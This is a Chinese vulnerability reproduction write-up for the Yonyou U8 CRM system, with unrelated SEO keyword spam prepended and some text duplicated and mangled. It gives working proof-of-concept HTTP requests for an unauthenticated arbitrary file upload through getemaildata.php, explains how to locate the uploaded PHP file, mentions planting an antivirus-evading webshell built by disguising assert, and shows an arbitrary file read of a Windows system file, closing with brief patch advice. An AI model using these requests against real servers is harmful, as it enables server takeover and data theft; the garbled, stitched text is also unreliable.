加强网站硬件建设方案,上海包装设计公司排名,网络营销外包推广策划方案,各类网站排名0x01 产品简介 用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件#xff0c;旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
0x02 漏洞概述 用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞#xff0c;攻击…0x01 产品简介 用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
0x02 漏洞概述 用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞攻击者通过漏洞可以获取到服务器权限。
0x03 复现环境
鹰图指纹web.body用友U8CRM 0x04 漏洞复现 文件上传PoC
POST /ajax/getemaildata.php?DontCheckLogin1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary----WebKitFormBoundarykS5RKgl8t3nwInMQ------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; namefile; filenamea.php
Content-Type: text/plain?php phpinfo();?
------WebKitFormBoundarykS5RKgl8t3nwInMQ PS访问的解析文件格式为upd***.tmp.php星号部分为返回的文件名的十六进制减去一例如上图中不带mht1022——31303232(十六进制)31303231十六进制减一——1021 验证url
http://your-ip/tmpfile/upd十六进制减一.tmp.php 上传免杀马子 PS利用 substr_replace() 函数变形 assert 达到免杀的效果
尝试连接 文件读取PoC
GET /ajax/getemaildata.php?DontCheckLogin1filePathc:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip 0x05 修复建议
关闭互联网访问权限文件上传模块做好权限强认证。 尽快打补丁
